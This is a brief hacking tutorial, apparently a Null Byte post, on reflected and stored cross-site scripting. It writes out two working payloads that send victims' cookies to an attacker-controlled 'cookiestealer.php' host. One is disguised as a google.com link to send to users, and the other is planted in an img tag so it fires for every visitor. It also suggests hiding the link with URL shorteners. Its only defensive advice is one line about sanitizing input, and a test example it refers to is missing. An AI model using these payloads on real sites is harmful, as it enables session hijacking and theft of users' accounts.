How Cross-Site Scripting (XSS) Attacks Sneak into Unprotected Websites (Plus: How to Block Them)
This is not good.
In this Null Byte, we will be educating you about XSS attacks and how to defend from them. There are two kinds of XSS exploits—non-persistent and persistent.
Non-persistent attacks are very common and usually found in HTTP queries such as HTML forms and website search bars. When the attack is practiced, it would usually be sent over a trusted domain or over a private message with a link to the XSS attack. Here is an example of what a test for XSS could look like:
This would cause an alert to appear with your session cookie in the browser, but the web page executed it. What does this mean? It's vulnerable.
We could then alter the attack to be directed towards a cookie logging script at our domain, and mask it in HTML and send it to fellow users:
<a href="http://www.example.com/index.php?id=" rel="nofollow" target="_blank" ><script>document.location='www.yourdomain.com/cookiestealer.php?c=' + document.cookie</script>">www.google.com</a>
That would appear legitimate to the person being attacked. If there was no HTML allowed, you could always mask the link with a URL shortener.
The attack is performed similar to the last attack, aside from being posted in a static location. Let's take a look at how the attacks will differ:
<img src="><script>document.location='www.yourdomain.com/cookiestealer.php?c=' + document.cookie'</script>">
Everyone who views this page will have their cookies logged to a remote cookie-logging script.
If you're a web developer, there is only one way to prevent this. Close your tags properly and sanitize input!
That's all for this Null Byte.
I know this is a hard subject to wrap your head around, so if you're a beginner, keep me and the rest of the crew entertained with your questions in IRC!